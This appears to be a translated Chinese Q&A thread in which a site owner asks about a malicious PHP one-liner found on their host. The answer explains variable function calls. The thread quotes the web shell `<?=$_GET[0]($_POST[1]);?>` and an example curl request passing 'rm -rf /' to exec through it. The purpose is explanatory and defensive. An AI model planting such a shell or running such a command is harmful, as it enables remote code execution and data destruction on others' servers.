刚发现恶意的PHP代码

我使用以下代码在我的主机帐户上发现了恶意PHP文件

<?=$_GET[0]($_POST[1]);?>

请帮助我更好地理解这段代码,这个代码对于上传者有什么可能?

提前致谢.

解决方法:

$func = 'strlen';
$arg  = 'foo';

echo $func($arg); // output: 3

您正在查看变量函数调用.在您的情况下,函数名称来自URL中的查询字符串和HTTP POST正文中的参数.所以,这可以执行任何事情.可能有人会尝试使用它来通过exec执行shell代码.

例如.:

$curl example.com/infected_file.PHP?exec -d 'rm%20-rf%20/'

(不是100%肯定会这样做,我不想尝试,但你明白了.)

相关文章

统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...
统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...
前言 之前做了微信登录,所以总结一下微信授权登录并获取用户...
FastAdmin是我第一个接触的后台管理系统框架。FastAdmin是一...
之前公司需要一个内部的通讯软件,就叫我做一个。通讯软件嘛...
统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...